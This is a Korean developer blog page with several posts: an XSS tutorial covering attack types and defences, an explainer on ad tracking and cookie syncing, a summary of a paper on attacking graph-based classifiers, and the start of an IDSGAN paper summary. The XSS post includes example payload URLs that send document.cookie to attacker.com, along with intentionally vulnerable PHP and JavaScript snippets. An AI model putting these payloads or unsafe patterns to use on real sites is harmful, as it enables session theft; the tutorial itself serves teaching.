shine's dev log

XSS (Cross-Site Scripting)의 개념과 종류

dong1 — Sun, 7 Dec 2025 03:38:59 +0900

1. XSS (Cross-Site Scripting)

XSS 공격은 대표적인 웹어플리케이션 취약점으로, 공격자의 코드를 다른 사이트에 심어서 이를 실행시키는 공격이다.

공격의 코드가 다른 사이트에서 실행됨으로써, 공격자는 피해자의 쿠키/세션 정보를 읽거나 웹페이지 내에서 특정 동작을 수행하는 등의 공격을 할 수 있다.

간단하게 말해서 XSS 공격의 특징은,

1) Code injection 공격으로,

2) 악의적인 script가 target 웹사이트에 inject 되어,

3) Inject된 코드는 victim이 target 웹페이지를 방문할때, victim의 브라우저에서 실행된다.

2. XSS의 원리

XSS 공격에는 크게 세 종류의 등장인물이 등장한다.

1) Victim user (피해자)

Victim은 XSS 공격을 당해서 자신의 쿠키값과 같은 중요 정보를 탈취당하는 사람이다.

2) Target server

Target은 정상적인 서비스를 하고 있는 웹서버이다.

기본적으로 XSS 공격에 취약하다는 가정을 가지고 있다.

3) Attacker server (공격자)

Attacker는 Target을 이용해서 Victim의 중요 정보를 탈취하는 사람이다.

XSS 공격에서 이 세 등장인물들의 관계는 아래와 같은 그림으로 설명할 수 있다.

[그림 1] XSS의 대표적인 패턴

[그림 1]에서 보다시피, Attacker는 우선 XSS 취약점이 있는 Target을 찾아야 한다.

그리고 Attacker는 쿠키 등과 같은 중요 정보를 탈취하는 악성 script를 만들어 어떻게든 Target에게 몰래 심는다.

최종적으로 Attacker의 목표는, 생성한 악성 script를 Target 웹사이트에 방문한 Victim의 브라우저에서 실행되도록 하는 것이다.

여기서 중요한 점은, Target을 방문한 상황에서 악성 script가 실행된다는 점이다. 즉, 악성 script가 target의 context에서 실행된다.

위의 목표를 달성하기 위한 다양한 방법들이 존재하는데, 이 방법들이 XSS 공격의 다양한 종류들로 분류된다.

Q. 그냥 Attacker가 취약한 웹페이지 만들고 거기서 공격하면 안되나? Attacker가 만든 웹페이지에 악성 script 숨겨 놓고 Victim이 그 웹페이지에 접속하도록 유도만 하면, 자연스럽게 Victim의 브라우저에서 악성 script가 돌지 않을까?

A. 우선, 쿠키값과 같은 중요 정보들은 도메인별로 부여되고 관리된다는 점을 기억하자.

따라서 만약 위와 같이 Attacker의 웹페이지에서 공격을 하면 결국 Attacker가 탈취하는건, Victim이 Attacker의 웹페이지 (attacker.com)에서 받은 쿠키 정보들이다. 그러면 굳이 공격하는 의미가 없게 된다.

반대로 Target 웹페이지 (target.com)이 은행이나 온라인 쇼핑과 같은 서비스라고 한다면, 해당 웹페이지의 쿠키값을 탈취하는건 굉장히 Attacker 입장에서 유용한 정보다.

그래서 굳이굳이 XSS 취약점이 있는 Target 웹페이지를 찾고, Target을 매개로 공격하는 것이다.

3. XSS의 종류

XSS 공격의 종류는 공격 방식에 따라 4가지로 분류할 수 있다.

1) Reflected XSS (Server-side XSS)

2) Stored XSS

3) DOM-based XSS (Client-side XSS)

4) Universal XSS

4. Reflected XSS (Server-side XSS)

[그림 2] Reflected XSS의 대표적인 패턴

Reflected XSS의 공격 시나리오는 [그림 2]과 같다.

Step 1) Attacker는 Victim에게 악성 script가 포함된 악성 링크를 전송한다

악성 URL은 보통 아래와 같이 정상적인 웹페이지 뒤에 script가 붙어있는 형태이다.

http://target.com/vulnerable.php?user=Alice</p><script>fetch_cookie('http://attacker.com", document.cookie);</script><p>

여기서 눈여겨봐야 할 것은, 이 URL이 공격자가 만든 attacker.com이 아니라, 공격자와 무관하게 정상적으로 서비스하고 있는 target.com 으로 연결된다는 것이다.

Step 2) Victim이 악성 URL을 클릭하여, target.com에 접속한다.

URL에 포함된 target.com/vulnerable.php 파일이 원래 아래와 같이 되어있다고 가정해보자.

간단하게 설명하면, url의 query string 중에서 'user' 파라미터를 읽어와서 표시해주는 PHP 코드이다.

<?PHP
  echo "<p> Welcome! Current User: " . $_GET['user'] . "</p>";
?>

원래 정상적인 접근(http://target.com/vulnerable.php?user=Alice) 이라면, 'user' 파라미터에 Alice만 들어있으므로 웹페이지에

"Welcome! Current User: Alice" 이렇게만 표시되어야 한다.

Step 3) Target서버가 victim에게 악성 script가 포함된 response를 보낸다.

아까 악성 URL 에 뒤에

이렇게 요상한 script태크가 붙어있는걸 볼 수 있었다.

해당 코드는 공격자(attacker.com)에게 victim의 쿠키값을 보내는 악성 script 이다.

Victim은 이렇게 위험한 악성 script가 포함된 웹페이지 response를 target 서버로부터 받게 된다.

Step 4) Victim의 브라우저에서 악성 script가 실행되어, 공격자에게 쿠키 데이터가 전송된다.

Target 서버로부터 받은 response에 포함된 악성 script가 victim의 브라우저에서 실행되면서, 결국 공격자에게 자신이 target.com 에서 사용하는 쿠키값을 attacker.com 에게 보내게 된다.

5. Stored XSS

[그림 3] Stored XSS의 대표적 패턴

Stored XSS의 공격 시나리오는 [그림 3]과 같다.

Step 1) Attacker가 Target 웹서버에 저장된 데이터에 악성 script를 몰래 심는다.

Stored XSS에서 가장 핵심적인 부분이라고 할 수 있다. 어떤식으로든 Attacker는 Target의 웹서버에 악성 script를 심어야 한다.

가장 대표적인 예시로는 target.com이 어떤 게시글을 포스팅하고, 다른사람들이 조회할 수 있는 사이트라고 가정할 때, 공격자가 악성 script가 포함된 게시글을 올리는 것이다.

그렇게 되면, target.com은 이 글을 자신의 서버에 저장하게 되고, 자연스럽게 target의 웹서버에 script가 몰래 심기게 된다.

Step 2) Victim이 Target의 웹페이지를 방문하기 위해 request를 보낸다.

더 자세히 말하면, Attacker의 악성 script가 삽입된 Target의 웹페이지를 방문해야 한다.

앞서 예시에서 공격자가 target.com 에 글을 포스팅했다고 했는데, Victim은 해당 포스팅에 방문을 해야 한다.

전형적인 Reflected XSS와 달리, Stored XSS에서는 Attacker가 만든 악성 링크를 클릭하지 않고, 정상적인 접근으로도 공격이 가능하다.

Step 3) Target은 Victim에게 웹페이지 response를 보낸다.

이때, 포스팅 웹페이지를 전송하면서, 공격자가 미리 삽입해두었던 악성 script 역시 함께 전송된다.

Step 4) Victim의 브라우저에서 악성 script가 실행되어, 공격자에게 쿠키 데이터가 전송된다.

위 시나리오에서는 공격자가 Target의 웹페이지에 포스팅을 올리는 것을 예시로 들었지만, 이외에도 다양한 공격 시나리오가 가능하다.

대표적으로 2009년에는 트위터 프로필에 URL-encoded 데이터를 저장할 수 있다는 사실을 악용해서, 자기 트위터 프로필에 악성 스크립트를 삽입한 경우도 있었다.

어쨌거나 트위터가 사용자의 프로필 정보를 자기 웹서버에 저장할 것이므로, 이것도 결국 Attacker가 Target의 웹서버에 script를 몰래 심은 케이스라고 볼 수 있다.

6. DOM-based XSS

앞서 살펴본 Reflected XSS나 Stored XSS는 공통적으로 Target의 서버에서 Victim에게 response가 넘어올때부터 Attacker가 심어둔 script가 포함되어 있었다.

하지만, DOM-based XSS는 Target의 서버에서 response가 올때까지도 악성 script가 포함되어있지 않다.

어떻게 이게 가능할까?

[그림 4] DOM-based XSS의 대표적인 패턴

DOM-based XSS의 공격 시나리오는 [그림 4]과 같다.

Step 1) Attacker는 Victim에게 악성 script가 포함된 악성 링크를 전송한다

악성 URL은 보통 아래와 같은 형태이다.

https://target.com/showmeprofile.php#<script>fetch_cookie('http://attacker.com", document.cookie);</script>

이번에도 마찬가지로, 정상적인 target.com의 URL 뒤에 fragment로 Attacker에게 쿠키정보를 보내는 script가 들어가 있다.

하지만, fragment 값은 서버에게 전달되지 않으므로, target.com은 이 fragment 값을 인지하지 못하고 있는 상태이다.

Step 2) Victim이 악성 URL을 클릭하여, target.com 에 접속한다.

위 URL 에 포함된 target.com/showmeprofle.php에 아래와 같은 JavaScript 코드를 포함하고 있다고 가정해보자.

아래 코드는 현재 document에다가 <b> 태그를 추가하는 코드이고, 추가로 URL을 읽어와서 함께 표시해주는 코드이다.

<script>
  document.write(
    "<b>Current URL</b>: " + document.baseURI);
</script>

원래 정상적인 접근이라면, 웹페이지에

"CurrentURL: https://target.com/showmeprofile.php" 이렇게 표시되어야 한다.

Step 3) Target 서버가 victim에게 response를 보낸다.

중요한 포인트는 위에 보여줬던 php 코드가 victim의 브라우저에게 보내지는 과정에서, 아직 attacker의 악성 script는 삽입되지 않은 상태라는 것이다.

왜냐하면, 저 document.write 함수는 victim의 브라우저에서 실행되는 코드이기 때문에 아직까지는 script가 response에 포함되어있지 않다.

Step 4) Victim의 브라우저에서 악성 script가 실행되어, 공격자에게 쿠키 데이터가 전송된다.

Victim의 브라우저에서 document.write 함수가 실행되면서, document.baseURI 값에 아까 링크에 있는

https://target.com/showmeprofile.php#<script>fetch_cookie('http://attacker.com", document.cookie);</script>

이 URI가 웹페이지에 추가되고, 이 추가된 웹페이지를 브라우저가 실행하면서 비로소 attacker가 삽입한 악성 script도 실행된다.

7. Universal XSS (UXSS)

사실 Universal XSS (UXSS)는 앞선 XSS에 비해 잘 알려지지 않았고, 또 공격 방식도 앞선 XSS들과는 다른 공격이다.

UXSS는 target 웹페이지의 취약점을 이용한 앞선 XSS와는 다르게, 브라우저 자체의 취약점을 이용한 XSS이다.

그래서 앞선 XSS들은 취약한 Target 웹어플리케이션만을 대상으로 공격이 가능했다면,

UXSS는 취약한 브라우저를 사용한다면, 모든 웹사이트가 공격 대상이다. (그래서 이름이 universal 이다.)

그렇기 때문에 굉장히 위험하고 심각도가 높은 취약점이라고 할 수 있다.

[그림 5] UXSS

예를 들어서, [그림 5]와 같이 Attacker가 자신의 웹페이지 attacker.com에 공격하고 싶은 Target인 target.com을 iframe 으로 열었다고 가정해보자.

정상적인 브라우저의 경우에는, 이 attacker.com의 origin은 attacker.com으로, 그리고 그 안의 iframe으로 열린 target.com의 origin은 target.com으로 인식해야 한다.

그래서 attacker.com에 포함된 악성 script는 target.com의 resource에 접근하지 못해야 한다. (Same-Origin Policy)

하지만, UXSS 취약점이 있는 브라우저는 attacker.com의 악성 script 가 target.com의 resource에 접근해서 임의로 조작하는 것이 가능하다. 예를 들어서 아래와 같은 공격이 가능하다.

// UXSS를 이용해 attacker가 target의 document에 접근이 가능하다는 가정
let script = document.createElement('script');
script.innerText = fetch_cookie()';

위 코드는 원래 attacker.com의 DOM element들만 조작이 가능해야 하지만, 저 코드의 앞부분에서 UXSS를 이용해 target의 document object에 접근이 가능해졌다는 가정하에, target의 쿠키와 같은 중요 정보 탈취가 가능해진다.

8. XSS의 방어

앞선 reflected, stored, DOM-based XSS 공격들의 패턴에서 보았듯이

대부분의 XSS공격들은, 원래는 <script> 로 인식하지 말아야 할 문자열들을 <script>로 인식하고 실행시키면서 발생한다.

따라서 방어법 또한 간단하다.

1) 사용자의 입력값에서 특수문자같은걸 제한하여 위와같은 script 태그를 사용하지 못하게 하거나

2) 브라우저에서 출력할때 <, > 이런 특수문자들을 &It;, > 등으로 인코딩해서 표현해주는 것이다.

최근에는 이런 입/출력값 검증을 쉽게 해주는 라이브러리나 (e.g., OWASP ESAPI) 함수들 (e.g., htmlspecialchars) 이 잘 나와있어서 이런 것들을 적절히 잘 사용해주면 된다.

Universal XSS의 경우에는 공격 패턴이 다른만큼 방어기법도 다르다.

서로 다른 origin을 가지는 웹 리소스에 접근하지 못하도록, 즉 Same-Origin Policy를 만족하도록 브라우저 단에서 잘 처리를 해줘야 한다.

대표적으로 서로 다른 site는 서로 다른 프로세스로 관리하는 site isolation 등이 있다.

오늘 배운 내용을 정리해보면,

1. XSS 공격은 Attacker의 악성 script를 Target의 context에서 실행시키는 공격이다.

2. XSS의 종류는 reflected, stored, DOM-based, universal 이 있다.

3. XSS의 방어는 입/출력값 검증을 통해 script가 삽입되거나 실행되지 않도록 하면 된다.

온라인 광고와 트래킹 기법 (Cookie syncing, 3rd-party cookie, Ad network)

dong1 — Mon, 3 Jun 2024 04:11:07 +0900

1. 온라인 광고

웹서핑을 하다보면 손쉽게 광고를 발견할 수 있다.

특히 광고를 보다보면 내가 얼마전에 쿠팡에서 찾아봤던 제품이라던지, 내가 평소에 관심있었던 내용들이 광고에 뜨는것을 보았던 경험이 있을 것이다.

이렇게 사용자를 타겟팅해서 광고를 하는 것은 모두 온라인 트래킹을 활용한 것인데, 이번에는 과연 이런 광고들이 나를 어떻게 식별하고 tracking 하는지 알아보자.

2. Publisher와 Advertiser

온라인 광고 시장에는 크게 Publisher와 Advertiser (provider)가 존재한다.

Publisher

Publisher는 사용자가 방문하려는 웹페이지의 주인이라고 보면 된다.

예를 들어서, 사용자가 유튜브 사이트에 접속하면 거기서 publisher는 유튜브인 것이고, 뉴스 사이트에 접속하면 해당 뉴스 사이트가 publisher 인 것이다.

Publisher들은 자신들이 웹사이트를 운영하면서 남는 자리에 광고를 게시할 수 있다. 이렇게 광고를 게시하게 되면 돈을 벌 수 있기 때문이다!

Advertiser (provider)

Advertiser 는 ad provider 라고도 불리는데, 이녀석들은 광고를 하고자 하는 사람들이다. 즉 광고주라고 보면 된다.

Advertiser 들은 publisher에게 일정 금액을 지불하고 자신들의 광고를 게시할 수 있다.

한가지 예시로 이 두 집단을 정리해보자.

예를 들어서 당신이 이 티스토리 블로그에 접속해서 글을 보고 있는데 거기서 쿠팡 광고가 떴다고 가정해보자. 여기서 티스토리 블로그가 Publisher, 쿠팡이 Advertiser 인 것이다.

가장 간단하게 광고를 하는 방법은, 쿠팡(Advertiser)이 티스토리(Publisher)한테 자신의 광고를 표시할 수 있는 JS 코드조각을 주고, 티스토리는 이 코드조각을 자신의 HTML 에 삽입함으로써 광고를 게시할 수 있다.

Publisher 는 자신들이 웹페이지를 관리하면서 광고 수익을 얻을 수 있으니 좋고, Advertiser 는 사용자들이 많이 접속하는 사이트에 자신의 광고를 많이 노출시킬 수 있으니 좋은것이다. 결국 이 둘은 상생관계라고 보면 된다.

3. Ad Network

하지만 advertiser 가 일일히 publisher 들을 찾아다니면서 자기 광고를 게시해달라고 하거나, publisher 가 자기 웹사이트에 광고좀 해달라고 advertiser들을 찾아다니는 것은 꽤나 번거로운 일이다.

따라서 이 둘을 연결해주는 일종의 중재기관이 있는데, 이것이 바로 Ad Network이다.

Ad Network는 마지 경매장처럼 동작한다. Publisher들이 자기 웹사이트에 광고올릴 자리가 있다고 Ad network에 요청하고, Advertiser들도 자기가 이런 광고를 띄우고 싶다고 Ad network한테 요청한다.

그러면 Ad Network들은 양쪽의 요청사항들을 잘 취합한 뒤 이를 연결해준다.

[그림 1] 은 사용자들, publisher, advertiser, ad network 의 관계를 간단하게 나타낸 그림이다.

(1) 우선 Advertiser 가 Ad network를 통해 Publisher 의 웹페이지에 Ad나 tracking contents 관련 JS 나 이미지 등을 심고

(2) 사용자가 publisher의 웹페이지에 방문하면

(3) advertiser 로부터 ad / tracking contents 를 받아오게 된다.

[그림 1] Users, Publisher, Advertiser, 그리고 Ad network의 관계

4. 온라인 트래킹 (Online Tracking)

지금까지 온라인 광고 세계가 어떻게 돌아가는지 알아보았다.

사실 사용자의 특징 (나이, 연령대, 관심사 등등)을 파악하고 이에 맞게 광고를 내보내는 것이 광고주 입장에서는 굉장히 중요한 일이다. 최소한의 광고 노출로 최대한의 사람들에게 광고 효과를 누릴 수 있기 때문이다.

그렇다면 그런데 과연 광고들이 어떻게 내가 관심있는 상품들을 알고 나한테 추천을 해주는 것일까?

이렇게 온라인 사용자들의 특징을 파악하고, 이를 위해서 사용자가 다른 어느 사이트를 방문했는지 확인하는 과정을 온라인 트래킹 (Online Tracking)이라고 한다.

온라인 광고가 활성화 된 이후로, 사용자들을 트래킹하는 이 작업은 계속해서 발전해오고 있다. 지금부터 대표적인 온라인 트래킹 방식들을 알아보자!

5. 서드파티 쿠키(3rd-Party cookie)를 이용한 Cookie syncing

온라인 트래킹에는 서드 파티 쿠키를 이용한 cookie syncing이 가장 정확하면서 많이 이용되는 방법이다.

쿠키에 대해서 잘 모르는 경우 아래 이전 게시글을 참고하길 바란다.

https://ddongwon.tistory.com/73

Cookie, Web cache (쿠키, 웹 캐시의 개념)

1. Cookie 쿠키는 문자와 숫자의 조합으로 된 작은 파일이다. 서버는 쿠키를 통해서 클라이언트를 식별하고 이에 맞춰 다양한 서비스를 제공한다. 아마존 사이트에 들어가면 내가 보았던 상품 목

ddongwon.tistory.com

[그림 2] Cookie syuncing (출처: Cookie Synchronization: Everything You Always Wanted to Know But Were Afraid to Ask, WWW '19)

우선 cookie syncing 의 목적은 여러 트래커들이 서로 다른 웹페이지를 방문하는 서로 다른 사용자들을 잘 분류하여, 누가 어느 페이지들에 방문했는지를 확인하는 것이다.

여기서 핵심은 최대한 많은 사용자들을 트래킹 하기 위해서 여러 트래커 회사들이 협력하고 있고, 이 협력하는 과정에서 서로의 정보를 공유하는 방법으로 cookie syncing을 이용한다는 것이다.

(즉 트래킹 하는 방법 자체라기 보다는, 여러 트래커가 각자 트래킹한 사용자들을 서로 맞춰보는 과정이라고 이해하면 편하다.)

[그림 2]를 보면서 이해를 해보자.

우선 트래킹을 하기 원하는 트래커 tracker.com와 advertiser.com, 두개의 adverstiser가 있다고 가정해보자. 이 둘은 은 서로 협력하는 관계이다. 이 둘의 목적은 하나의 사용자가 다양한 웹사이트를 방문할 때 이를 하나의 동일한 사람으로 인식하는 것이다.

step 1)

tracker.com은 website1.com에 자신의 JS 코드 (tracker.com/script.js)를 삽입해놓았고,

advertiser.com은 website2.com에 자신의 이미지 (advertiser.com/adBanner.png)를 삽입해놓았다.

(이미 advertiser와 publisher가 ad-network를 통해 협력한 상황일 것이다.)

step 2)

이제 사용자가 website1.com 에 접속하면, tracker.com에 해당하는 쿠키를 세팅하면서, 자신의 쿠키값인 user123을 저장하고 이를 tracker.com에게 알려준다.

똑같은 사용자가 website2.com 에 접속하면, advertiser.com 에 해당하는 쿠키를 세팅하면서, 자신의 쿠키값인 userABC를 저장하고 이를 advertiser.com에게 알려준다.

중요한 점은, 쿠키는 "각 사이트" 마다 설정이 된다는 것이다.

위의 과정에서 사용자는 website1.com과 website2.com 두개의 사이트에만 접속했지만, 해당 사용자에 대한 쿠키는 tracker.com, advertiser.com 에도 각각 세팅된 상황이다.

지금까지의 상황을 정리해보면, tracker.com은 이 사용자가 user123 이라는 식별자를 가진 것을 알고, advertiser.com은 이 사용자가 userABC라는 식별자를 가진 것을 알고 있다.

즉, 아무리 이 두 advertiser가 머리를 맞대보아도 user123과 userABC가 같은 사용자라는 것은 알수가 없다. (왜냐면 식별자 user123 과 userABC는 다르기 때문)

step 3)

마지막으로 사용자가 website3.com 에 접속한다. 단, 여기서 website3.com에는 tracker.com 만 트래킹을 하고 있다고 가정해보자.

그럼 사용자는 website3.com 에 삽입된 작은 이미지 파일 tracker.com/beacon.gif 을 읽게 되고, 이 요청은 tracker.com의 미리 짜여진 계획에 의해서 advertiser.com으로 redirect 된다.

[그림 3] tracker.com 에서 advertiser.com으로 redirect된 사용자의 요청(beacon.gif) (출처: Cookie Synchronization: Everything You Always Wanted to Know But Were Afraid to Ask, WWW '19)

결국 [그림 3]과 같은 요청이 사용자로부터 advertiser.com에게 발생하게 된다. (tracker.com 이 redirect 시켰으므로)

다만, 해당 사용자는 advertiser.com에게 userABC 라는 쿠키 ID를 가지고 있는 상태이므로 (website2.com 방문할 때 생겼던 것), 이를 advertiser.com에게 전송하게 된다.

결론적으로 이 순간, tracker.com과 advertiser.com은 각각 자신이 알고있었던 user123과 userABC가 같은 하나의 사용자임을 깨닫게 된다.

이런식으로 여러 Advertiser들은 다양한 사이트들에 자신들의 스크립트나 이미지들을 심어놓고, 누가 누구인지 알아내는 온라인 트래킹 과정을 열심히 수행하게 된다. (그래서 표적광고 해서 돈 많이 번다.)

중요한 점은, 이런 트래킹 방식은 웹사이트(website1/2/3.com)와 다른 도메인(advertiser/tracker.com)의 쿠키, 즉 서드파티 쿠키(3rd-Party cookie)를 사용할 수 있기 때문에 가능하다는 것이다.

하지만 최근에 서드파티 쿠키가 사용자들을 과도하게 트래킹하여 프라이버시를 침해한다는 문제가 발생함에 따라, 다양한 브라우저에서 서드파티 쿠키를 차단하려는 움직임이 발생하고 있다.

사파리와 파이어폭스는 이미 허용되지 않은 서드파티 쿠키를 제한하고 있고, 구글 크롬도 조만간 서드파티 쿠키를 디폴트로 제한하겠다고 선언했다.

이렇게 서드파티 쿠키가 점점 설자리를 잃어가는 상황에서 cookie syncing 말고 다른 방법들이 필요해보인다. 대표적인 발법으로 first-party cookie를 이용하는 방법이 있고, 실제로 여러 연구들* 에서도 이를 적용하고 있긴 하다.

(* CookieGraph: Understanding and Detecting First-Party Tracking Cookies, ACM CCS, 2023)

근데 그래도 서드파티 쿠키를 이용한 트래킹의 성능에는 많이 부족할 것으로 예상된다.

6. 그 외의 방법들...

쿠키를 이용하지 않고 온라인 트래킹을 하는 방법들도 많이 존재한다.

대표적으로 웹브라우저의 다양한 세팅들 (User agent, installed fonts, screen resolution, ...) 을 마치 그 사람의 지문처럼 이용하여 동일한 세팅을 가지면 동일한 사용자라 가정하는 Browser Fingerprinting 기법이 있고,

그 외에도 캐시 정보를 이용한 방법, 네트워크 정보들을 이용하는 방법 등 있고, 앞으로도 다양한 방법들이 제안될것이다..!

오늘의 내용을 정리해보면,

1. 온라인 광고는 Publisher, Advertiser, 그리고 그들을 연결해주는 Ad network로 구성된다.

2. 표적 광고를 위해 온라인 트래킹 기법들이 사용된다.

3. 가장 대표적인 방법은 서드파티 쿠키를 이용한 cookie syncing 이다.

[논문] Attacking Graph-based Classification via Manipulating the Graph Structure

dong1 — Mon, 5 Feb 2024 04:02:45 +0900

Binghui Wang and Neil Zhenqiang Gong, "Attacking Graph-based Classification via Manipulating the Graph Structure", CCS '19

0. Abstract

본 논문에서는 그래프 기반의 classification 모델을 대상으로 공격을 한다. 그리고 제목에서 알 수 있듯이 공격은 그래프의 구조를 변경 (즉, edge의 연결구조를 변경) 함으로써 수행한다.

이전의 이미지 도메인에서 자주 활용되던 adversarial attack을 그래프 도메인에 적용시킨 초기 논문 중 하나로, 개인적으로 굉장히 좋아하는 논문이기도해서 간단하게 정리해보겠다...

1. Introduction

그래프 기반의 classification 모델은 malware detection, 소셜 네트워크에서의 fake (Sybil) user detection 등에 자주 사용된다. 그 중에서도 특히 일부 노드의 레이블 정보와 그래프 구조만을 가지고 classification을 수행하는 (1) collective classification, 딥러닝을 이용하는 (2) GNN 방식이 주로 사용되고 있다.

본 논문에서는 가장 유명한 collective classification 방식 중 하나인 LinLBP (Linearized Loopy Belief Propagation) 방식의 기법을 대상으로 공격을 진행하고, 공격된 그래프를 GNN 모델에도 transfer attack 하는식으로 진행한다.

2. Background

본 절에서는 앞서 말한 대표적인 collective classification 방식 중 하나인 LinLBP 기반의 classfication 모델에 대하여 설명하겠다.

우선 그래프의 구조가 주어져있다고 가정해보자 (node + edge).

그리고 방어자는 전체 노드 중 일부 노드의 레이블을 알고 있다고 가정해보자. 예를 들어 소셜 네트워크에서 정상 계정과 허위 계정을 분류하고자 할 때, 방어자가 전체 수많은 노드 중에서 확실한 정상 계정 100개와 확실한 허위 계정 100개를 알고 있다고 가정해보겠다.

그렇다면, 아래 [그림 1]과 같이 해당 노드에 prior score를 할당해준다. 일반적으로 theta 값은 0.5를 많이 할당하므로, 위의 예시에 따르게 되면, 확실히 알고있는 정상 노드에는 +0.5점을, 그리고 확실히 알고있는 허위 노드에는 -0.5점을, 나머지 대부분의 노드에는 0점을 부여하게 되는 것이다.

[그림 1] Prior score assignment

이제 부여한 prior score 를 기반으로 propagation을 진행한다. 아래 [그림 2] 와 같이 propagation을 진행하게 되는데, 저기서 q가 앞서 할당한 prior score 벡터이고, A가 그래프의 연결관계를 나타내는 adjacency matrix, W는 그냥 가중치 matrix인데 무시해도 된다.

[그림 2] Posterior score computation

수식은 복잡해보이지만, 결국 부여한 prior score 를 인접한 노드들이 나눠먹는 형식으로 돌아가게 된다. 예를들면, 확실히 알고있는 허위 노드 근처에 있는 노드들은 높은 양(+)의 점수를 얻게 되고, 정상 노드 근처에 있는 노드들은 낮은 음(-)의 점수를 얻게 된다.

이렇게 propagation을 여러번 반복하게 되고, 최종적으로 얻는 점수가 posterior score 이며, 이 값이 양수이면 최종적으로 허위노드, 음수이면 최종적으로 정상노드로 판단하는 것이다.

다양한 collective classification 방식들도 기본적으로 1) prior score 계산, 2) posterior score 계산 두 단계를 거친다. 이러한 collective classification 방식들이 유용한 이유는 기본적으로 허위 계정은 허위계정끼리, 정상 계정은 정상계정끼리 연결관계를 가진다는 가정에서 출발한 것이다.

3. Attack Design

그렇다면 지금부터 본격적으로 이 논문에서 어떻게 LinLBP 방식을 대상으로 공격했는지 알아보자.

우선, 공격자의 목표는 그래프에서 일부 노드의 classification 결과를 positive(허위계정) 에서 negative(정상계정)으로 바꾸는 것이다. 이렇게 함으로써 공격자는 방어자의 방어를 우회할 수 있다. 여기서 공격자가 목표로 삼는 노드를 target nodes라고 한다.

이제 공격자의 목표를 수식으로 나타내보면, 아래 [그림 3]과 같다. (참고로 v를 target nodes로 나타낸다.)

[그림 3] Attacker's objective function

우선 C 행렬은 임의의 노드 u, v 사이의 edge 를 조작할 때 드는 cost 이고, B 행렬은 original graph와 manipulate 하려는 graph 사이의 변화를 나타낸다.

예를들어, original graph에서 노드 u와 v 사이에 엣지가 존재하고 B_u,v 의 값이 1이라면, 공격자는 해당 엣지를 제거하려고 한다. 반대로 original graph에서 노드 u와 v 사이에 엣지가 존재하지 않고 B_u,v 의 값이 1이라면, 공격자는 해당 엣지를 새로 연결하려고 하는 것이다.

결국 행렬 B와 C를 element-wise 곱하게 되면, 공격하는데 드는 총 cost 를 나타내고, 공격자는 이를 최소화 하려고 하므로 objective function에서 min 을 적용한 것이다.

추가로, 공격이 성공하려면 target nodes들에 대해서 positive -> negative 로 변해야 하므로, FNR = 1이라는 제한조건 이 붙는다.

마지막으로, 공격자는 target node당 공격에 필요한 edge 조작개수를 K로 제한시켰고, 이를 마지막 제한조건으로 붙여놓았다.

[그림 3]의 수식에서 볼 수 있듯이 여러가지 제한 조건이 있으므로, 해당 수식을 바로 푸는 것은 불가능하다. 따라서 [그림 3]의 수식을 [그림 4]의 수식으로 풀어쓸 수 있다.

[그림 4] Attacker's objective function2

이렇게 함으로써 FNR=1 의 제한조건을 주번째 항에 lagrangian multiplier 를 추가하여 붙여주었고, collective classification 의 propagation에 활용되는 iteration을 변수 t를 활용하여 나타낼 수 있다.

전체적으로 [그림 4]의 수식을 해석해보면, 공격자는 공격에 필요한 총 cost 를 최소화하려고 하고 (첫번째 항) 동시에 공격 성공률을 최대로 높히려고 한다 (두번째 항).

따라서 만약 lambda의 값이 커지만, 공격성공률에 집중을 하게 되므로 공격에 필요한 총 cost가 늘어나고, lambda 의 값이 작아지만, 공격에 필요한 총 cost는 최소화되지만, 공격 성공률은 조금 낮아지게 될 것이다.

이제 해당 [그림 4]의 수식을 PGD 기반의 공격으로 풀어내면 최종적으로 그래프 구조의 변화를 나타내는 B 행렬을 구할 수 있다.

조금 더 자세한 풀이는 논문을 참조하길 바란다..

4. Evaluation

이제 해당 공격이 실제로 통하는지 알아보자. 저자들은 [그림 5]와 같이 총 4개의 데이터셋에 대해서 공격을 수행했다.

[그림 6] Attack Result

공격 결과는 [그림 6]과 같다. 표에 있는 RAND, CC, CLOSE 는 target node를 선택하는 방법이고, Equal, Uniform, Categorical은 cost matrix에 값을 할당시키는 방법을 의미한다. (그닥 중요한건 아니므로 설명하지 않고 넘어가겠다.)

전체적인 공격 성공률을 보면 (FNR column), 대부분의 경우에서 공격 성공률 90% 내외를 달성하였고, 유일하게 Facebook dataset에서 RAND 일 경우에만 공격성공률이 60%대를 나타내었다.

이는 실제로 앞서 소개한 공격이 효과적이었음을 나타낸다.

또 한가지 특징은 # Add / # Del column에서 볼 수 있듯이, 공격자는 대부분 공격할 때 엣지를 추가하는 경향이 있고, 공격에 엣지를 제거하는 경향은 비교적 낮다는 것이다.

앞서 Intro에서 설명했듯이 graph classification에는 1) collective classification과 2) GNN 방식이 있다. 지금까지 설명한 공격은 collective classification을 가정하고 한 공격이다.

공격 과정에서 optimization problem을 풀 떄, GNN을 대상으로 풀면 너무 연산이 복잡해 거의 불가능하므로, 저자들은 우선 collective classification 을 대상으로 한 공격된 그래프를 가지고 GNN으로 classification을 적용하는, 일명 transfer attack을 수행해보았다.

[그림 7] Attack Transferability

그 결과 [그림 7]에서 볼 수 있듯이 GCN을 포함한 다양한 GNN classification 모델에서 대부분 50%를 넘는 비교적 높은 공격 성공률을 보인 것을 확인할 수 있다.

게다가, [그림 8]에서 볼 수 있듯이 대표적인 GNN 대상 공격인 Nettack에 비해서도 높은 공격 성공률과, 압도적으로 짧은 공격 시간을 달성하였다.

[그림 8] Comparing with Nettack

5. 마치며

논문에서는 오늘 내가 소개한 내용보다 훨씬 많은 내용들이 들어있다. 개인적으로 좋아하는 연구자들이고, 좋아하는 논문이라서 다들 꼭 읽어보는걸 추천한다.

[논문] IDSGAN: Generative Adversarial Networks for Attack Generation against Intrusion Detection

dong1 — Mon, 21 Mar 2022 00:36:31 +0900

논문 제목 : IDSGAN: Generative Adversarial Networks for Attack Generation against Intrusion Detection

0. abstract

IDS는 네트워크 공격에 사용되는 malicious packet를 탐지하고 이를 차단함으로써 보안을 지켜주는 도구이다. 최근에는 ML의 도움에 힘입어 빠르게 그 성능이 증가하고 있다.

하지만 ML 모델을 공격하는 adversarial attacks에 의해 모델의 robustness가 손상될 수 있다.
본 연구에서는 GAN을 활용하여 adversarial attaks에 대비하도록 함으로써 IDS 를 보다 강력하게 만드는 프레임워크 IDSGAN을 제안한다. detection system의 내부 구조는 밝혀지지 않은 black-box attack 상황이라 가정하고 연구를 진행하였다.

NSL-KDD 데이터셋을 통해 IDSGAN의 성능을 보였으며, modified 되는 features를 바꿔가면서 IDSGAN의 robustness를 보였다.

1. Introduction

